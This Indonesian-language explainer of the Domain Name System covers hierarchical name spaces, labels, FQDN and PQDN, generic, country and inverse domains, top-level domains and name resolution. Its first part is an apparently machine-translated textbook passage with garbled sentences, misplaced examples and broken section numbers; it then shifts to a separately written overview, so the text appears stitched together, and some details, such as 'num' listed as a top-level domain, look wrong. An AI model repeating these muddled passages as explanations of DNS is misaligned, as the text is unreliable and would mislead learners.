Dalam ruang nama hirarki, setiap nama terdiri dari beberapa bagian. Bagian pertama dapat menentukan sifat organisasi, bagian kedua dapat menentukan nama, bagian ketiga dapat menentukan departemen, dan jadi tidak ada. Dalam hal ini, kewenangan untuk menetapkan dan mengontrol ruang nama dapat terdesentralisasi.
Sebuah otoritas pusat dapat menetapkan bagian dari nama yang mendefinisikan sifat organisasi dan nama. Tanggung jawab untuk sisa nama yang dapat diberikan kepada organisasi itu sendiri. Sufiks dapat ditambahkan ke nama host atau menentukan sumber daya. Manajemen organisasi tidak perlu khawatir bahwa awalan dipilih untuk host diambil oleh organisasi lain karena meskipun bagian dari alamat yang sama, alamat seluruh yang berbeda.
Sebagai contoh, asumsikan dua perguruan tinggi dan satu perusahaan panggilan penantang komputer mereka, perguruan tinggi pertama diberi nama oleh otoritas pusat seperti fhda.edu, perguruan tinggi kedua diberi nama berkeley.edu, dan perusahaan diberi smart.com. nama Ketika organisasi-organisasi ini menambahkan penantang nama ke nama yang mereka telah diberikan, hasil akhirnya adalah tiga nama dibedakan:, challenger.berkeley.edu, dan challenger.smart.com. challenger.fhda.edu yang pusat otoritas kontrol hanya bagian dari nama, bukan nama keseluruhan.
1,5 NAMA DOMAIN SPACE
Untuk memiliki ruang nama hirarkis, ruang nama domain dirancang. Dalam desain ini, nama didefinisikan dalam sebuah struktur terbalik-pohon dengan akar di atas. Pohon itu hanya dapat memiliki 128 tingkat: tingkat 0 (root) ke level 127. Sedangkan lem seluruh akar pohon bersama, setiap tingkat pohon mendefinisikan tingkat hirarkis (lihat Gambar. 1).
1.6 Label
Setiap simpul di pohon memiliki label, yang merupakan string dengan maksimum 63 karakter. Label root adalah string kosong (string kosong). DNS mensyaratkan bahwa anak-anak dari sebuah node (node yang cabang dari node yang sama) memiliki label yang berbeda, yang menjamin keunikan nama domain.
1.7 Nama Domain
Setiap simpul di pohon memiliki nama domain. Sebuah nama domain lengkap adalah urutan dari label yang dipisahkan oleh titik (.). Nama domain selalu dibaca dari node sampai akarnya. Label terakhir adalah label dari akar (null). Ini berarti bahwa nama domain lengkap selalu berakhir dengan label null, yang berarti karakter terakhir merupakan titik nol karena string apa-apa. Gbr.2 menunjukkan beberapa nama domain.
1.7.1 Nama Lengkap Domain Berkualitas (FQDN)
Jika label diakhiri dengan string null, disebut nama domain berkualifikasi lengkap (FQDN). Sebuah FQDN adalah nama domain yang berisi nama lengkap dari sebuah host. Ini berisi semua label, dari yang paling spesifik sampai yang paling umum, yang secara unik menentukan nama host.
challenger.atc.fhda.edu.
Misalnya, nama domain adalah FQDN dari sebuah komputer bernama penantang dan diinstal di Advanced Technology Center (ATC) di De Anza College. Sebuah server DNS hanya dapat mencocokkan FQDN ke alamat. Perhatikan bahwa nama harus diakhiri dengan label null, tetapi karena null di sini berarti apa-apa, label diakhiri dengan titik (.).
1.7.2 Sebagian Nama Domain Berkualitas (PQDN)
Jika label tidak diakhiri dengan string null, disebut nama domain berkualifikasi parsial (PQDN),. A PQDN mulai dari node tapi tidak mencapai akar. Hal ini digunakan ketika nama harus diselesaikan termasuk dalam situs yang sama sebagai klien. Berikut resolver bisa menyediakan bagian yang hilang, yang disebut akhiran, untuk menciptakan sebuah FQDN.
Misalnya, jika pengguna di fhda.edu tersebut. Situs ingin mendapatkan alamat IP dari komputer penantang, ia dapat mendefinisikan nama parsial Challenger
Klien DNS atc.fhda.edu menambahkan akhiran. Sebelum melewati alamat untuk server DNS. Klien DNS biasanya memegang daftar akhiran. Berikut dapat beberapa dari daftar sufiks di De Anza College.
1,8 Domain
domain adalah subtree dari ruang nama domain. Nama domain adalah nama domain dari simpul di bagian atas subtree.
1.9 DNS DI INTERNET
DNS adalah protokol yang dapat digunakan di berbagai platform. Di Internet, nama domain ruang (pohon) dibagi menjadi tiga bagian yang berbeda: domain generik, domain negara, dan domain terbalik.
1.9.1 Generic Domain
Domain generik mendefinisikan host terdaftar sesuai dengan perilaku generik mereka. Setiap simpul di pohon mendefinisikan suatu domain, yang merupakan indeks untuk nama ruang database domain seperti di Gbr.6. Tingkat pertama di bagian domain generik memungkinkan tujuh label tiga-karakter yang menggambarkan jenis organisasi seperti terlihat pada tabel 1. Baru-baru ini beberapa tingkat pertama-label telah dietujui.
1.9.2 Country Domain
Negara bagian menggunakan domain-karakter negara singkatan dua (misalnya, iq untuk Irak).
1.9.3 Invers Domain domain invers digunakan untuk memetakan sebuah alamat ke nama.
1.10 Pemetaan Nama untuk Alamat
Sebagian besar waktu, resolver memberikan nama domain ke server dan meminta alamat yang sesuai. Dalam hal ini, server memeriksa domain generik atau domain negara untuk menemukan pemetaan. Jika domain ini dari bagian domain generik, resolver menerima nama domain seperti tech.atc.edu, jika nama domain dari domain negara bagian, resolver menerima nama domain seperti tech.atc.iq.
1,11 Pemetaan Alamat untuk Nama
Seorang klien dapat mengirim alamat IP ke server untuk dapat dipetakan ke nama domain. Ini disebut pointer query (PTR) DNS. Di sini menggunakan domain terbalik.
1,12 DNS Pesan
DNS memiliki dua jenis pesan: query dan response. Kedua jenis memiliki format yang sama. Pesan query terdiri dari header dan catatan pertanyaan, tanggapan pesan terdiri dari header, catatan pertanyaan, jawaban catatan, catatan berwibawa, dan catatan tambahan.
Pengertian DNS
Domain Name System (DNS) adalah distribute database system yang digunakan untuk pencarian nama komputer (name resolution) di jaringan yang mengunakan TCP/IP (Transmission Control Protocol/Internet Protocol). DNS biasa digunakan pada aplikasi yang terhubung ke Internet seperti web browser atau e-mail, dimana DNS membantu memetakan host name sebuah komputer ke IP address.
Selain digunakan di Internet, DNS juga dapat di implementasikan ke private network atau intranet dimana DNS memiliki keunggulan seperti:
* Mudah, DNS sangat mudah karena user tidak lagi direpotkan untuk mengingat IP address
sebuah komputer cukup host name (nama Komputer).
* Konsisten, IP address sebuah komputer bisa berubah tapi host name tidak berubah.
* Simple, user hanya menggunakan satu nama domain untuk mencari baik di Internet maupun di Intranet.
DNS dapat disamakan fungsinya dengan buku telepon. Dimana setiap komputer di jaringan Internet memiliki host name (nama komputer) dan Internet Protocol (IP) address. Secara umum, setiap client yang akan mengkoneksikan komputer yang satu ke komputer yang lain, akan menggunakan host name. Lalu komputer anda akan menghubungi DNS server untuk mencek host name yang anda minta tersebut berapa IP address-nya. IP address ini yang digunakan untuk mengkoneksikan komputer anda dengan komputer lainnya.
Sejarah DNS
Sebelum dipergunakannya DNS, jaringan komputer menggunakan HOSTS files yang berisi informasi dari nama komputer dan IP address-nya. Di Internet, file ini dikelola secara terpusat dan di setiap loaksi harus di copy versi terbaru dari HOSTS files, dari sini bisa dibayangkan betapa repotnya jika ada penambahan 1 komputer di jaringan, maka kita harus copy versi terbaru file ini ke setiap lokasi. Dengan makin meluasnya jaringan internet, hal ini makin merepotkan, akhirnya dibuatkan sebuah solusi dimana DNS di desain menggantikan fungsi HOSTS files, dengan kelebihan unlimited database size, dan performace yang baik. DNS adalah sebuah aplikasi services di Internet yang menerjemahkan sebuah domain name ke IP address. Sebagai contoh, www untuk penggunaan di Internet, lalu diketikan nama domain, misalnya: yahoo.com maka akan di petakan ke sebuah IP mis 202.68.0.134. Jadi DNS dapat di analogikan pada pemakaian buku telepon, dimana orang yang kita kenal berdasarkan nama untuk menghubunginya kita harus memutar nomor telepon di pesawat telepon. Sama persis, host komputer mengirimkan queries berupa nama komputer dan domain name server ke DNS, lalu oleh DNS dipetakan ke IP address.
Struktur DNS
Root-Level Domains
Domain ditentukan berdasarkan tingkatan kemampuan yang ada di struktur hirarki yang disebut dengan level. Level paling atas di hirarki disebut dengan root domain. Root domain di ekspresikan berdasarkan periode dimana lambang untuk root domain adalah (“.”).
Top-Level Domains
Pada bagian dibawah ini adalah contoh dari top-level domains:
* com : Organisasi Komersial
* edu : Institusi pendidikan atau universitas
* org : Organisasi non-profit
* net : Networks (backbone Internet)
* gov : Organisasi pemerintah non militer
* mil : Organisasi pemerintah militer
* num : No telpon
* arpa : Reverse DNS
* xx : dua-huruf untuk kode negara (id:Indonesia,sg:singapura,au:australia,dll)
Top-level domains dapat berisi second-level domains dan hosts.
Second-Level Domains
Second-level domains dapat berisi host dan domain lain, yang disebut dengan subdomain. Untuk contoh: Domain Bujangan, bujangan.com terdapat komputer (host) seperti server1.bujangan.com dan subdomain training.bujangan.com. Subdomain training.bujangan.com juga terdapat komputer (host) seperti client1.training.bujangan.com.
Host Names
Domain name yang digunakan dengan host name akan menciptakan fully qualified domain name
(FQDN) untuk setiap komputer. Sebagai contoh, jika terdapat fileserver1.detik.com, dimana fileserver1 adalah host name dan detik.com adalah domain name.
Bagaimana DNS Bekerja?
Fungsi dari DNS adalah menerjemahkan nama komputer ke IP address (memetakan). Client DNS disebut dengan resolvers dan DNS server disebut dengan name servers. Resolvers atau client mengirimkan permintaan ke name server berupa queries. Name server akan memproses dengan cara mencek ke local database DNS, menghubungi name server lainnya atau akan mengirimkan message failure jika ternyata permintaan dari client tidak ditemukan. Proses tersebut disebut dengan Forward Lookup Query, yaitu permintaan dari client dengan cara memetakan nama komputer (host) ke IP address.
* Resolvers mengirimkan queries ke name server
* Name server mencek ke local database, atau menghubungi name server lainnya, jika ditemukan akan diberitahukan ke resolvers jika tidak akan mengirimkan failure message
* Resolvers menghubungi host yang dituju dengan menggunakan IP address yang diberikan name server
Kesimpulan
DNS adalah hasil pengembangan dari metode pencarian host name terhadap IP address di Internet. Pada DNS client (resolver) mengirimkan queries ke Name Server (DNS). Name Server akan menerima permintaan dan memetakan nama komputer ke IP address Domain Name Space adalah pengelompokan secara hirarki yang terbagi atas root-level domains, top-level domains, second-level domains, dan host names.